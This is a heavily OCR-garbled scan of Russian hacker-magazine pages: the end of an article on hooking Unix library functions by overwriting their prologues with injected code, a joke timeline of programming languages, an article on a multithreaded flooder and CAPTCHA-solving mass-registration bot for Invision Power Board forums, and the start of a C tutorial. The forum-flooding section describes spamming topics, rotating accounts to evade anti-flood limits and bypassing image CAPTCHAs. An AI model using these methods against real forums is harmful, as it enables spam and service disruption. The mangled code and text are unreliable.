зІ 2 еоі(Ьиі_розЦ); 

//ставим СЗГі (геі) или восстанавливаем 
стандартный пролог обратно 
іі(раде_ЬиІ[((ипзідпеб іпЦр) % РАОЕ_ЗІ2Е] == ОхСЗ) 
раде_ЬЫ[((ипзідпесІ іпЦр) % РАОЕ_ЗІ2Е] = 0x55; 

еізе 

раде_ЬЫ[((ипзідпесІ іпЦр) % РАОЕ_ЗІ2Е] = ОхСЗ; 

// копируем ІГіипк-код поверх функции деіз 
тетсру(&раде_ЬиЩ(ипзідпесІ іп!)р) % РАОЕ_ЗІ2Е], 
ЬиЩзІ,зІ 2 еоі(ЬиЩзЦ); 



Компилируем программу и убеждаемся, что она рабо- 
тает, вплотную приближая нас к созданию полноцен- 
ного перехватчика. Чуть-чуть усложнив 1Нипк-код, мы 
сможем не только выводить свои данные на экран, но и 
сохранять Іод в файл! 



Й - з * 71 — 

результат работы кода, «впрыснутого» в деіз (звездоч- 
ки и точки идут косяками за счет буферизации) 



Программировать в машинных кодах очень неудобно, 
и возникает естественное желание задействовать Си 
и другие языки высокого уровня. И это возможно! Пос- 
кольку іИипк-код вызывается в контексте вызывавшего 
его процесса, он может загружать свои собственные 
динамические библиотеки, вызывая біореп/бізут. На 
машинном коде пишется лишь крохотный загрузчик, а 
основной код перехватчика сосредотачивается в дина- 
мической библиотеке, которую можно написать и на Си. 
Кстати говоря, отказываться от функции деіз совер- 
шенно необязательно, ведь мы можем перенести ее 
функционал в нашу динамическую библиотеку! Только 
переносить необходимо именно функционал (то есть 
переписывать функцию заново), а не пытаться копи- 
ровать код, так как деіз вызывает «свои» подфункции 
по относительным адресам. При перемещении ее 
тела на другое место они изменятся и... здравствуй, 
зедтепіайопіаиіі! 
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Перехват функций не во сне, а наяву 



Самое сложное в перехвате — это определить границы машинных инструкций, поверх которых записывается команда пе- 
рехода на перехватчик (он же Фипк, расположенный в нашем случае в теле функции деіз). По-хорошему, для решения этой 
задачи требуется написать мини-дизассемблер, но... это же сколько всего писать придется! А можно ли без него обойтись? 
Можно! 

В начале большинства библиотечных функций расположен стандартный пролог вида РІІЗН ЕВР/МОѴ ЕВР,Е5Р/51ІВ ЕЗР, 
ХХХИ (55Н/89Н Е5И/ 83И ЕСИ ХХН), дающий нам 5 байт — необходимый минимум для внедрения! Встречаются и другие, слег- 
ка видоизмененные прологи, например: РІІЗН ЕВР/МОѴ ЕВР,ЕЗР/РІІЗН ЕОІ/РІІЗН ЕЗІ (55И/89И Е5И/ 57И/ 56И); РІІЗН ЕВР/ 
МОѴ ЕАХ, ОРРРРРРРРН/МОѴ ЕВР, ЕЗР(55И/В8Н РЕИ РЕИ РРИ РРИ/89И Е5И); РІІЗН ЕВР/ХОР ЕАХ, ЕАХ/МОѴ ЕВР, ЕЗР (55И/31 И - 
0И/89Н Е5И). Хороший перехватчик должен их учитывать. 



функция деПітег 
с прологом, да- 
леким от стан- 
дартного 






Таким образом, наш перехватчик должен проверить 
первые 5 байт перехватываемой функции и, если они 
совпадают со стандартным (или слегка оптимизиро- 
ванным) прологом, скопировать этот пролог в свое 
тело и выполнить его перед передачей управления 
оригинальной функции. А куда его можно скопиро- 
вать? Сегмент данных, как уже говорилось, нам недо- 
ступен, стек трогать нельзя (перед передачей управ- 
ления на функции он должен быть восстановлен), а 
сегмент кода запрещен для модификации. 



Существует по меньшей мере три решения: 

во-первых, мы можем вызывать функцию тргоіесі, 
присвоив кодовой странице атрибут ѵѵгііаЫе (но это 
некрасиво); 

во-вторых, трогать стек все-таки можно: забрасываем 
пролог на верхушку, забрасываем туда же копию всех 
аргументов и передаем ей управление как ни в чем 
не бывало; 

в-третьих, мы можем поступить так: 



Фрагмент програм- 


// «коллекция» разнообразных прологов для сравнения 
ипзідпесі сіпаг ргоІод_1 []={0х55И, 0x89, 0хЕ5, 0x83, ОхЕС}; 


мы-инсталлятора, 


ипзідпесі сНаг ргоІод_2[]={0х55, 0x89, 0хЕ5, 0x57, 0x56}; 


анализирующей 


пролог перехваты- 


// буфер, в который будет записан сгенерированный код 


ваемой функции и 


ипзідпесі сІпагЬи!_сосІе[1 024]; 


устанавливающей 


обработчике 


// определяем адрес перехватываемой функции 


соответствующим 


р = тзутфазе, (пс_пате); 


прологом: 




// если в начале перехватываемой функции расположен ргоІод_1 , то внедряем в ее начало саІІ на 
// ргераге_ргоІод_1 

і((!тетстр(р, ргоІод_1, зігео((ргоІод_1)) 
саІІ_г(Ьазе, (пс_пате, "деіз", 0); 

// если в начале перехватываемой функции расположен ргоІод_2, то внедряем в ее начало саІІ на 
// ргераге_ргоІод_2 

і((!тетстр(р, ргоІод_1, зігео((ргоІод_2)) 

саІІ_г(Ьазе, (пс_пате, "деіз", ойзеі ргараге_ргоІод_2-о!Ізе1: ргераге_ргоІод_1); 
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Теперь заносим номер «нашего» пролога в регистр 
ЕАХ, чтобы перехватчик знал, какой ему пролог эму- 
лировать. 



ргераге_ргоІод_1 : 

МОѴ ЕАХ, 0x1 
ОМРзГіогІсІо_Ьедіп 

ргераге_ргоІод_2: 

МОѴ ЕАХ, 0x2 
ОМРзГіоПсІо_Ьѳдіп 

ргераге_ргоІод_п: 

МОѴ ЕАХ, 0x2 
ЛѴІРсІо_Ьѳдіп 

сІо_Ьѳдіп: 

// основной код перехватчика. [Е5Р+4]+5 содержит адрес 
вызванной функции — это поможет нам отличить перехваченные 
функции друг от друга; передача управления перехваченной функ- 
ции с эмуляцией ее «родного» пролога 
ЭЕС ЕАХ 
02ргоІод_1 
ЭЕС ЕАХ 
Л ргоІод_2 

ргоІод_1 : ; // эмулируем выполнение пролога типа РІІЗН ЕВР/МОѴ 
ЕВР.Е8Р/51ІВ ЕЗР,ХХХ 
РІІЗН ЕВР 
МОѴ ЕВР.ЕЗР 

БЫВ ЕЗР, Ьуіе ріг [ЕАХ] ; берем ХХГі из памяти 
ІІЧС ЕАХ ; на следующую машинную команду 
ЛѴІР ЕАХ 

ргоІод_2: ; // эмулируем выполнение пролога типа РІ)8В ЕВР/МОѴ 
ЕВР,ЕЗР/РІІЗН ЕОІ/РІІЗН ЕЗІ 
РІІЗН ЕВР 
МОѴ ЕВР, ЕЗР 
РІІЗН ЕйІ 
РІІЗН ЕЗІ 
ЛѴІР ЕАХ 



Базовый код перехватчика (расположен в деіз), подде- 
рживающий несколько различных прологов: 



Программа-инсталлятор анализирует пролог пере- 
хватываемой функции и в зависимости от результата 
внедряет в ее начало либо саІІ ргераге_ргоІод_1 , либо 
саІІ ргераге_ргоІод_2, где ргераге_ргоІод_х — метка, 
расположенная внутри Ібипк-кода, помещенного нами 
в функцию деіз. Команда саІІ занимает 5 байт и пото- 
му в аккурат накладывается на команду 811В ЕЗР,ХХИ 
так, что ХХИ оказывается прямо за ее концом. Поэтому 
сохранять ХХН в теле самого перехватчика не нужно! 
Команда 511В ЕЗР, Ьуіе ріг [ЕАХ], вызываемая изФіипк- 
кода, эмулирует выполнение ЗІІВ ЕЗР,ХХИ на ура! 
Приведенный пример портит содержимое регистра 
ЕАХ и работает только собес!- и зібсаІІ-функциями. Пе- 
рехват ІазІсаІІ-функций, передающих аргументы через 
ЕАХ, по этой схеме невозможен. Однако оригинальный 
ЕАХ можно сохранять в стеке и восстанавливать непос- 
редственно перед передачей управления перехвачен- 
ной функции, но в этом случае ЛѴІР ЕАХ придется за- 
менить на ВЕТКІ, а на верхушку стека предварительно 
положить адрес для перехода. 

Вот и все. Скелет перехватчика успешно собран и го- 
тов к работе. Остается дописать «боевую начинку». Это 
можетбыть и логгер, протоколирующий вызовы, и анти- 
протектор, блокирующий вызовы некоторых функций, 
например удаление файла, и макромашина, «подсовы- 
вающая» функциям клавиатурного ввода готовые дан- 
ные, и... да все что угодно! 



стандартный 
пролог функции 
деіаббгіпіо, испор- 
ченный несвоевре- 
менным переключе- 
нием планировщика 
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ШЧІХОЮ 



Проблемы стабильности 



Сконструированный нами перехватчик довольно капризен по натуре и периодически падает без всяких видимых причин. 
Почему это происходит? Рассмотрим функцию Іипс со стандартным прологом вида РІІЗН ЕВР/МОѴ ЕВР,ЕЗР. Допустим, 
процесс А выполнил команду РІІЗН ЕВР и только собирался приступить к выполнению МОѴ ЕВР,ЕЗР, как был прерван сис- 
темным планировщиком, и управление получил наш процесс В, осуществляющий перехват функции Іипс путем внедрения 
в ее начало инструкции саІІ. Когда процесс А возобновит свое выполнение, команды МОѴ ЕВР ЕЗР там уже не окажется, а 
будет торчать хвостовая часть от саІІ, при выполнении которой все пойдет вразнос. Конечно, вероятность такого события 
крайне мала, но в особо ответственных случаях с ней все-таки стоит считаться. 

Чтобы «обезопасить» перехват, необходимо сократить длину внедряемой инструкции до одного байта, но таких инструкций 
просто нет! То есть как это нет? А ІЫТ ОЗН (ОСИ) на что? Т радиционно она используется для организации точек останова и на 
прикладном уровне защищенного режима возбуждает исключение, которое легко перехватить из ядра, аточнее, из загружа- 
емого модуля. Об этом уже писалось в статье НапсІІіпд Іпіеггирі: Оезсгіріюг ТаЫе Тог Іип апб ргоТіТ, опубликованной в 59 номере 
рТігаск, так что не будем повторяться. 

Заметим, что ССТі конфликтуете некоторыми защитными механизмами и, естественно, с отладчиками, поэтому лучше внед- 
рять не ІІ\ІТ ОЗТт, а какую-нибудь «запрещенную» однобайтовую команду типа СЬІ (РАН), возбуждающую исключение, которое 
мы будем отлавливать. 



Точки останова 



Заключение 



Отладчики могутустанавливать программные точки ос- 
танова на библиотечные функции, внедряя в их начало 
команду ІІЧТ ОЗИ (ОСИ). В этом случае наш перехватчик 
не сможет распознать пролог, что не есть хорошо. 
Выход очевиден: сравнивать только 2-й, 3-й, 4-й и 5-й 
байты пролога, игнорируя первый байт. А что делать с 
точкой останова? Если записать саІІ поверх нее, то она 
будет затерта, и отладчик потеряет контроль за фун- 
кцией, что в некоторых случаях неприемлемо, и тогда 
необходимо внедряться со 2-го байта, но в этом случае 
команда саІІ полностью затрет ЗІІВ ЕЗР.ХХИ, и ХХИ при- 
дется сохранять где-то в другом месте. 



Механизмы перехвата АРІ-функций под ѴѴіпбоѵѵз хоро- 
шо исследованы, и предложить радикально новый трюк 
довольно трудно. ІІЫІХ-системы исследованы намного 
хуже, поэтому таят множество нераскрытых возмож- 
ностей, притягивающих хакеров и прочих творческих 
людей. Описанный мыщъх'ем способ — не единствен- 
ный и, вероятно, не самый удобный, к тому же до «про- 
мышленного применения» ему еще расти и расти. Тем 
не менее в моих утилитах, написанных на скорый хвост, 
он вполне нормально работает — как под І_іпих, так и 
под ВЗй. 

ВІЫАВѴ ѴОІІК’5 Т 



стандартный пролог 
функции ІсИтосІ, 
искаженной про- 
граммной точкой 
останова (ОСИ), 
установленной 
отладчиком 
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Заведи свш нсуиов Тренируй иіУ Вырасти ченпиоиов таранаиш 



Вес подробности на І)Пр:/2Ііикі.таі1.ги 



таіі 





ССЮІЫО 



шш 



Вазіс 

Вазіс Вѳдіппег’з 
АІІ-ригрозѳ ЗутЬоІіс 
Іпзігисііоп Сосіѳ — уни- 
версальный код сим- 
волических инструк- 
ций для начинающих. 
Бред. 






шш 



СЕЯіІ 



Мосіи Іа 2 

Вирт на своем паскале 
не успокоился. 

Мало ему. 



ГогіН 

Вообще, Чарльз 
Мур планировал его 
назвать РоиііИ, но это 
прелестное имячко не 
влезло в 5-тисимволь- 
ную рамку тогдашних 
ЭВМ. Получился РогіИ. 



С 

Денис Ритчи 
постарался. 




Ргоіод 

Создатели языков 
программирования 
продолжают жечь: 
РРЮдгаттіпд І_0(3іс. 




ВИЙ 

Асіа 

Язык специально для 
вояк. Вспоминается 
анекдот про «язык ада» 



I 



СоЬоІ 

Снова прелестное 
название: Соттоп 
Визіпезз Огіепіесі 
Бапдиаде — универ- 
сальный язык, пред- 
назначенный для 
бизнеса. 



РазсаІ 

Первое детище 
РІиклауса Вирта. 
Название у языка 
нормальное, а вот 
имя у Вирта — супер. 




РІА1 

А на этом языке еще 
моя мама писала. 



6ЕШ • ф ф 

и$р 

Списки, списки — мы 
все любим списки... 
На ЭТОМ, гово- 
рят, пашет етасз. 
Культурный шок. 




АІдоІ 

Джон Бакус не изме- 
нил себе: АБСогіИтіс 
Бапдиаде — на 
названия у него 
талант. 



50 лет 

кодерского 

трипа 

НИКОЛАЙ <30РІІ_ 



5ТАВТ НЕВЕ 






Рогігап 

РОРтиІе 

ТРАЫзІаІог — пере- 
водчик формул. 

В отечественных 
вузах на него до сих 
пор молятся. 
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РуІГіоп 

Назван, между про- 
чим, в честь моего 
любимого шоу Мопіу 
РуІИоп. И змейки 
здесь ни при чем. 







ОЬегоп 

Никлаус не унимается. 



1995 






С# 

«ОеІрИі для Місгозойо- 
поклонников». Кстати, 
очень удобная штука. 



^ѵа 

Язык программи- 
рования для кофе- 
варок и кофеваров. 




у 



ОЬегоп-2 

Нет слов... 
Одни эмоции. 




РегІ 

Ларри Уолл приду- 
мал. Он приезжал в 
Россию прошлой вес- 
ной. Гнобить не буду. 
Однако благодаря 
дыркам в реализациях 
создалось немало 
Наск-групп. 



РНР 

Расмус Лердорф изна- 
чально и не думал ника- 
ких языков придумы- 
вать — просто решил 
посчитать, сколько 
народу его резюме 
читает. Юзал РегІ. 





РеІрГіі 

Турбопаскаль мутиро- 
вал в Дельфи. Поклон 
компании Вогіапб. 



С ++ 

Бьярн Страуструп, 
несмотря на свою пти- 
чью фамилию, ухитрился 
написать на редкость 
нормальную штуку. 
Столько сплоитов — 
загляденье. 
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РООООТ 

/ ГОССОТ@СМАІІ_.ПІІ / 



Соб\пд/ хт 

Форум 

в топку 

Пишем флудер для форума ІРВ 




ЗАМЕТИЛ, ЧТО СЕГОДНЯ В 
СЕТИ МНОЖЕСТВО ФОРУ- 
МОВ? И ВСЕ КАКИЕ-ТО 
ОДИНАКОВЫЕ, ПРАВДА? 
НУ, НЕ В ПЛАНЕ СОДЕР- 
ЖАНИЯ, конечно, — т 
КРЕАТИВ У ВСЕХ ПОПЕР. 
ПРОСТО ПОСТРОЕНЫ ОНИ 
В ОСНОВНОМ НА ОДНОЙ 
И ТОЙ ЖЕ СКРИПТОВОЙ 
БАЗЕ. ТО ЕСТЬ У ВСЕХ 
ОДИНАКОВЫЕ ФОРМЫ 
ДЛЯ РЕГИСТРАЦИИ И ДЛЯ 
ОТПРАВКИ СООБЩЕНИЙ, 
ОДИНАКОВАЯ ЗАЩИТА. 
ПОНИМАЕШЬ, К ЧЕМУ Я 
ВЕДУ? НАПИСАЛ ПРО- 
ГРАММКУ ДЛЯ РАБОТЫ 
С ОДНИМ ФОРУМОМ, 

А ОНА БУДЕТ ПАХАТЬ 
СО ВСЕМИ ТАКОГО ЖЕ 
ТИПА. КРАСОТА! ХОЧЕШЬ 
— ФЛУДИ, ХОЧЕШЬ — РЕК- 
ЛАМЕ, А ПРИ ЖЕЛАНИИ 
ПРОСТО ПАРСЬ КАКУЮ- 
НИБУДЬ ИНФОРМАЦИЮ 
СО ВСЕХ ФОРУМОВ. 



Я в этой статье, вообще, собрался рас- 
сказать, как написать прогу для удаленной 
работы с одним форумом Іпѵізіоп Роѵѵег 
ВоагсІ 2х — добротно сделанный форум, с 
неплохой защитой, которую мы почти без 
проблем обойдем. Кстати, под удаленной 
работой я подразумеваю банальный флуд. 
Как написать программу для рекламы, ду- 
маю, ты и сам разберешься. С помощью 
этой статьи, я надеюсь, ты сможешь и не 
такие штуки написать. 

Ваяем флудер 

В чем наша задача? На подавляющем 
большинстве форумов анонимное со- 
здание сообщений запрещено, поэтому 
для флуда нужно залогиниться, получить 
куки, отпарсив ответ, и подставлять их в 
запрос при каждом обращении к жела- 
емому форуму. Аутентификация на фо- 
руме не так уж и сложна — надо просто 
сформировать пост-запрос с такими па- 
раметрами: геІегег=&ІІзегІ\Іате=ІІзег&Р 

аззѴѴогсІ=Разз&СоокіеОа{е=1 , а дальше 
глянуть, есть ли в заголовке ответа строка 
разз_йазІт, в которой и скрыт тб5-хэш па- 
роля. Благодаря этой простоте логинауже 
был написан не один брут для ІРВ, но это 
не наша задача — мы не брутфорсим, а 
флудим, ну, или рекламим. Залогинились, 
значит, отпарсили. Теперь осталось оста- 
вить сообщение, что, как ни странно, уже 
сложнее. Во-первых, в форумах ІРВ вто- 
рой версии существует два ключа защиты 
— розікеу и аиійкеу, — которые генериру- 
ются при запросе формы отправки сооб- 
щения. Без этих ключиков создание топи- 
ка невозможно — дополнительная защита 
от разработчиков форума, чтобы жизнь 
не казалась медом. Во-вторых, в начале 
страницы после <йітІ> идет несколько 
десятков килобайт сзз-стилей, поэтому 
скорость заметно уменьшится, но даже 
с небольшой скоростью (5 топиков в се- 



кунду) можно испортить нервную систему 
кому угодно (но наша задача заключает- 
ся исключительно в анализе ситуации, 
мы не собираемся никому трепать нервы, 
— прим. Горлума). Осталось только ска- 
чать страницу с формой создания топика, 
вынуть два ключа и послать последний за- 
прос на создание топика. 

Если же на форуме стоит антифлуд, то 
придется использовать сразу несколько 
юзеров. Этот способ хорош тем, что даже, 
если форум разрешает создавать топики 
только через каждые 30 секунд, за это 
время можно будет оставить количество 
топиков, равное количеству зареганных 
тобой пользователей, но, естественно, не 
превышающее ширину твоего канала. Так 
как флудить я собрался фиксированным 
количеством топов, то нужно уметь отли- 
чать сообщение ІІооб-контроля от уве- 
домления об удачном создании топика. 
Сообщение о флуде появляется вместо 
формы создания нового топика, поэтому 
встроить проверку на флуд нужно именно 
в функцию для получения ключей. Сооб- 
щение выглядит как обычная ошибка, где 
нам рекомендуют связаться с админист- 
ратором форума по мылу и рассказать о 
том, как же все-таки плохо работает его 
борда. Так проверяем, есть ли в ответе 
сервера намек на ошибку. 

\і роз('асІтіп_етаіГ, апзіІо\л/егсазе(РезиІІ))>01:Гіеп 
Ьедіп 

іпс(Тіоосіс): 

РезиІІ:="; 

ехіі; 

епб; 

Если в ответе содержится админский 
емейл, то увеличиваем счетчик заблокиро- 
ванных антифлудом запросов и начинаем 
заново, уже логинясь с другого юзера. Но 
где же взять столько пользователей, чтобы 
обеспечить беспрерывный флуд? 
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ЗНЕМЕ: 

ОТПРАВЛЯЕМ 
ІРВ В ТОПКУ 



пкі Скачиваем страницу 
с регистрацией 




1 Скачиваем картинку 2 Конвертируем в ВМР, 

обрезаем поля 



3 Сравниваем каждую 
полученную цифру с эталонами 



4 Находим самый похожий 
эталон — цифра распознана 



пк4 Завершаем регистрацию 




пк8 Засылаем на форум 
левое сообщение 
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РЕГИСТРИРУЕМ ЮЗЕРА 





ССЮІЫО 



і многопоточность ШШШШІт 




Любой флудер обязательно должен быть многопоточным для достижения максимальной скорости и, 
соответственно, эффективности. Флудить, пардон, лучше всего топиками, избавиться от них Довольно- 
таки сложно, да и вреда они принесут намного больше, чем сообщения. Как работать с ТТЬгеаф думаю, 
объяснять не надо, но все же напомню о том, что синхронизация — вещь не последняя, поэтому при 
обращении с ѴСЬ- компонентами всегда используй ЗупсЬгопіге. 
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/1/ картинка, которую мы будем распознавать 
/2/ альтернативные картинки 



Реггер 

Дай угадаю: ты думал, что столько «мяса» 
для флудераты будешь регистрировать ру- 
ками? Как бы не так. Напишем реггер и не 
просто реггер, а автоматическую машину 
регистрации с распознаванием картинок. Я 
не стал делать его универсальным, а прос- 
то выбрал самый сложный вариант с самой 
хитрой картинкой. Если ты разберешься с 
тем, как он работает, то накодить реггеры 
для всех остальных вариантов не составит 
труда. Итак, наш план действий: 

/1 / скачать страницу регистрации 
/2/ считать хитрый код 

и прибавить к игГу форума 
/3/ скачать картинку 
/4/ конвертировать 
/5/ распознать картинку 
/6/ завершить регистрацию 

Вроде бы с 1 — 3 пунктами осложнений быть 
не должно (см. сорцы и все предыдущие 
выпуски Хакера). Конвертация — это две 
строчки кода: сначала полностью разжи- 
маем ЛР(3, а потом присваиваем битмапу. 
А вот чтобы распознать картинку, придется 
немного попотеть. 

Кстати, при регистрации сначала тебя 
спросят, согласен ли ты с правилами, но 
нас совершенно не волнует ни вопрос, ни 
правила. Более того, нам никто не запреща- 
ет сразу пройти на страницу регистрации по 
этому адресу: 

іпбех.рНр?асІ=Ред&сорраизег=0&Іегт5геасІ=1& 
сорра_разз= 1 &адгее_іо_іегтз= 1 

Находим Іб-картинки по строке: «гедіб» 
ѵаІие=«.» Прибавляем значение к іпбех. 
рНр?асІ=Вед&ССЮЕ=ітаде&гс=. Теперь у 
нас есть полный путь к картинке. Но со ска- 
чиванием картинки при помощи ѴѴіпЗоск 
также возникают определенные трудно- 
сти, ведь картинка — не текст и содержит 
нулевые символы, поэтому помещать ее 
в зігіпд нельзя, для этого воспользуем- 
ся потоками(ТЗігеат) и посчитаем ее из 
сокета побайтово. Далее остается толь- 
ко загрузить битмап из потока функцией 
І_оабРготЗігеат и распознать. 

Опознание 

Начать писать распознаватель нужно с со- 
здания эталонов, то есть идеальных букв 
или цифр для определенных картинок. Для 
этого нужно сопоставить несколько вари- 



антов написания цифр и создать из них мак- 
симально похожую сразу на все картинку. 
От этого действа будет зависеть качество 
распознавания. Стоит учесть, что во всех 
картинках ІРВ посередине идетлиния, если 
серединного куска цифр нет нигде, то и не 
стоит пририсовывать ее к эталону. Хм... 
Пора составлять план распознавания. 

/1/ определить вертикальные 
и горизонтальные границы 
/2/ убрать все ненужные нам цвета, 
оставить только черный и близкий 
к черному цвет 
/3/ выделить активные зоны, 
то есть те места на картинке, 
где располагаются наши цифры 
/4/ сравнить каждую цифру 
с каждым эталоном 
/5/ сравнить в процентном 

отношении сходство цифры с эталоном 

Определить границы — это значит обрезать 
все лишние места, но, так как наши цифры 
всегда стоят на одних и тех же местах, для нас 
это скорее не вынужденная необходимость, а 
один шаг к удобству. Для того чтобы опреде- 
лить процент сходства, нужно сравнить цвета 
эталона и цифры. Либо они равны, либо нет 
— другого не дано, поэтому эталоны и уже го- 
товый к анализу рисунок должны состоять из 
двух цветов, обычно черного и белого, но мне 
вдруг захотелось, чтобы он был а-ля мороже- 
ное с томатным соком, и я сделал их красными. 
Определять нужные нам для распознавания 
пиксели, без фона и помех нужно по диапазо- 
ну РОВ. Пиксель с самыми максимальными 
цветовыми показателями был РОВ(44,44,44), 
поэтому заточку отсчета я принял именно его. 
Далее нужно было проверить каждый пиксель 
на «близость к черному» — и вот перед нами 
красно-белый вариант. Активные зоны есть не 
что иное, как положение потенциальных цифр 
на картинке, так что нам не придется рыскать 
по ней в их поиске, так как цифры на ІРВ'шных 
пикчах не меняют своего местоположения во 
время генерации. Мы знаем размер и коор- 
динаты начала, значит, можно исследовать 
конкретные зоны. Следующий момент — собс- 
твенно, самое определение цифр. Начинаем с 
первой активной зоны и двойным циклом срав- 
ниваем каждую цифру с эталоном. Получается 
4 цикла: 

/1/ смена активных зон 
/2/ смена эталонов 
/3/ анализ строки 



/4/ анализ пикселя 

Записываем в массив количество совпавших 
пикселей, сравниваем. Наибольший элемент 
массива и есть наша искомая цифра. 

Далее передаем серверу данные о картин- 
ке вместе с зашифрованным числом. Г ото- 
во. Миссия выполнена. 

Если кто-то решит взяться за альтернатив- 
ные картинки, использующиеся в ІРВ, то за- 
будьте про метод, о котором поведал вам я. 
Там все намного проще и без явно выражен- 
ных болезней заднего прохода. Эталонами 
будут служить не картинки, а результат ка- 
кой-нибудь хэш-функции, вроде тб5 или 
огб(зІг[1])+огб(зІг[2]). Дальше нужно просто 
скачать картинки и сравнить их хэши с эта- 
лонными — это, намой взгляд, самый простой 
способ разгадывания статичных картинок. 

Епіоу 

Подобные программы делать совсем не- 
сложно. Однажды, написав основу для бру- 
та/флудера/реггера, можно использовать 
ее для любых подобного рода приложений. 
Главное здесь — изучить работу данного 
сервиса: за что отвечают его параметры, 
какие из них переменные, какие константы. 
ЛичноядляанализаиспользуюМіпіВгоѵѵзег: 
он позволяет смотреть хидеры ЬИр-запро- 
сов, поля веб-форм в момент отправки, а 
также посылать деі- и розі-запросы — все в 
одном окне. На диске вместе с сорцами ищи 
последнюю его версию. Весь кодинг софта, 
эксплуатирующего веб-приложения, сво- 
дится к изучению сервиса — посылке/полу- 
чению данных и парсингу ответа. 

Если грамотно пользоваться такими веща- 
ми, то можно многое натворить: при массо- 
вой регистрации или создании топиков фо- 
румы нередко уходят в даун из-за обильного 
количества подключений к зці-базе. 
Флудер, описанный в этой статье, будет ра- 
ботать только лишь для ІРВ 2* и более. До- 
бавить поддержку первой версии — проще 
простого. Единственным отличием первой 
версии от второй является количество клю- 
чей: розІ_кеу в первой версии нет, а реггер 
будет работать для второй версии и с опре- 
деленными картинками, что при наличии 
прямых руклегко компенсируется. 

Но учти! Флудить — здоровью вредить. Луч- 
ше занимайся чем-нибудь более полезным и 
прибыльным. 

ВІЫАПѴѴОІЖ’ЗЗС 

На диске ты найдешь все ис- 
ходники и софт, упомянутый 
в статье. 
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СОЗДАН СВОЮ КОМАНДУ ИЗ РЕАЛЬНЫХ 
ИГРОКОВ И ПРИВЕДИ ЕЕ К ПОБЕДЕ 
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Сосііпд/ с/с++ 

Си с нуля 




Научился 
запускать 
компилятор. 
Толку 
пока мало. 



Написал 
первую 
консольную 
программу. 
Не пашет. 



Двое суток — 
и она заработала. 

Си — классная штука! 



Приятели 
рассказывали 
про ѴѴіпАРІ. 
Много думал. 



Наткнулся 
в Сети 
на МЗОІМ. 

Учу английский. 



КОД НА СИ СТАВИТ В ТУПИК? ЧУВСТВУЕШЬ СЕБЯ УЩЕРБНЫМ, РАЗБИРАЯ МНОГОСТРАНИЧНЫЕ ЛИСТИНГИ 
СПЛОИТОВ? ДРУЗЬЯ СМЕЮТСЯ НАД ТОБОЙ, А МАМА ПРИВЯЗЫВАЕТ ТЕБЕ НА ШЕЮ КОТЛЕТУ, ЧТОБЫ ХОТЯ 
БЫ СОБАЧКИ С ТОБОЙ ДРУЖИЛИ? ЗАПРАВЬСЯ КАК СЛЕДУЕТ НООТРОПАМИ И ЭНЕРГЕТИКАМИ — 

ОНИ ТЕБЕ ПРИГОДЯТСЯ. СЕЙЧАС ТЫ БУДЕШЬ КОДИТЬ НА СИ. 



Присоединяйся! 

Знаешь, у меня в последнее время начало 
появляться ощущение, что нас, си-кодеров, 
как-то все меньше и меньше становится. 
Все в Оеірііі подались и там и остались. 
Оеірііі — удобная штука. И запутаться в ней 
практически невозможно — не то что в си. 
Компиляторов у нас бездна, среды разра- 
ботки вообще не всегда прилагаются, а без 
них не всякий кодер разберется, что к чему. 
Вряд ли это вдохновит тех, кто привык к 
йеірііі. Вот приводятся у кого-нибудь статьи в 
тексте на родном си-коде. Что написано — 
понятно, а как заюзать — нет. Знаешь, я не 
буду тебя мучить синтаксисом или подроб- 
ной документацией всех ключей того или 
иного компилятора — с этим, думаю, у тебя и 
без меня достаточно геморроя. Я просто 
самым банальным образом покажу, как со- 
здать проект и начать в нем что-нибудь пи- 
сать. Что-угодно. Хоть НеМо ѵѵогісі, хоть ВАТ. 

Новый проект 

Современные системы программирования лег- 
ко сбивают с толку еще зеленого кодера тем, 
что предлагают ему все мыслимые и немысли- 
мые возможности. Хочешь, говорят, мы тебе 
сразу целый ѴѴогсІ в виде шаблона приложения 
дадим? Или, мол, хочешь МРС, АН, ѴСІ_ и еще 
миллион разной фигни в своем проекте пои- 
меть? О, ужас! Прочь! Прочь, демоны! Нам все- 
го этого не надо. Нам нужен простой и пустой 
проект. Алгоритм его получения следующий: 



/ Стартуй студию (или в случае 6.0 — сам си). 

/ В появившейся среде жми 
Рііе -» Ыеѵѵ -» Ргоіесі 

/ Нас интересует обычное ѵѵіп32-приложение 
на си, поэтому переходи в закладку ѴізиаІ 
С++РгоіесІз и выбирай ѴѴіп32 Ргоіесі. 
Все остальное, предложенное студией, — 
ересь, и рассмотру не подлежит. Фи. 

/Указывай внизу имя проекта и куда 
его плюхнуть, а затем стучи по кнопке ОК. 

/Должен появиться ужасный ѴѴіп32 Арріісаііоп 
ѴѴігагсІ, который, если оставить без вни- 
мания и сразу нажать на РіпізН, обеспечит 
тебя тонной чужого и совершенно беспо- 
лезного кода в своем проекте. В визарде 
переходи в закладку Арріісаііоп ЗеШпд. 

/ Здесь тебе следует отметить, что приложение, 
которое ть і создае ш ь , — ѴѴіпсІ оѵѵз Ар рі і саіі о п 
и что проект должен быть пуст(ЕтрІургоіесІ). 
Даже если ты хочешь консольное приложе- 
ние — все так и оставь, я ниже объясню, как 
к нему перейти. 

/После всего проделанного тобой должно 
появиться пустое и серое окно студии, ниче- 
го интересного не предвещающее, зато с но- 
веньким проектом слева в Зоіиііоп Ехріогег. 

/ Жми правой клавишей на название проекта 
(не солюшена, а именно проекта) и выбирай 
АсІсІ -» АсІсІ пеѵѵ Нет. Мы хотим добавить 
в пустой проект файл, в котором мы, собс- 
твенно, и будем писать нашу программу. 

/Выбирай С++ Рііе, вбивай имя и жми ОК. 



Давай определимся 

Я себе и МісгозоК изменять не стану, поэтому 
слов «давай определимся со средой и ком- 
пилятором» ты здесь не прочтешь. Вернее, 
не прочтешь в родном для них контексте. 
Тут все очень просто. Два слова. Первое — 
ѴізиаІ. Второе — Зіисііо. Здоровый такой па- 
кет, в который входит ѴізиаІ С++. Он-то нам и 
нужен. По-моему, ничего лучше найти ты не 
сможешь. Я в этом уверен. Сейчас на рынке 
можно найти целую тучу версий студии: 

М3 ѴЗ 6.0 — для любителей поштамповать 
драйвера; 

М3 ѴЗ .ЫЕТ 2002 (7.0) — первая студия за- 
точенная под ,І\ІЕТ, однако не потерявшая 
очарования шестой; 

М3 ѴЗ .ЫЕТ 2003 — ненавистная мне версия, 
проекты которой не читаются моей любимой 
седьмой; 

и то ли вышедшая, то ли еще не вышедшая, 
но совершенно точно появившаяся в емуле 
М3 ѴЗ .ЫЕТ 2005, которая нашему брату, по- 
моему, абсолютно не нужна. 

Для тихого старта я всегда советую седьмую. 
Доставай ее любыми возможными и невоз- 
можными путями и радуйся — большинство 
